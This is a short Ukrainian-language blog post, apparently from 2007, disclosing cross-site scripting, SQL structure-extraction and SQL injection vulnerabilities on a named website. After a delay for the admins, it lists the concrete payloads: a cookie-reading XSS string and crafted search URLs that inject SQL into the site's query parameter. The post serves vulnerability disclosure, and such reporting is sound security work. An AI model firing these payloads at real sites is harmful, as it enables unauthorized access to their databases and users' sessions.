Уразливості на www.idevelopernetwork.com
19:38 20.12.200728.07.2007
У січні, 31.01.2007, я знайшов Cross-Site Scripting, SQL DB Structure Extraction та SQL Injection уразливості на сайтіі http://www.idevelopernetwork.com. Про що найближчим часом сповіщу адміністрацію сайта.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
20.12.2007
XSS:
- alert(document.cookie) (IE)
- цікавий (IE)
SQL DB Structure Extraction:
http://www.idevelopernetwork.com/resources/index.html?q=%27
SQL Injection:
http://www.idevelopernetwork.com/resources/index.html?q=%27%20OR%20LINKDESC%20LIKE%20%27
Дані уразливості досі не виправлені. Що дуже несерйозно.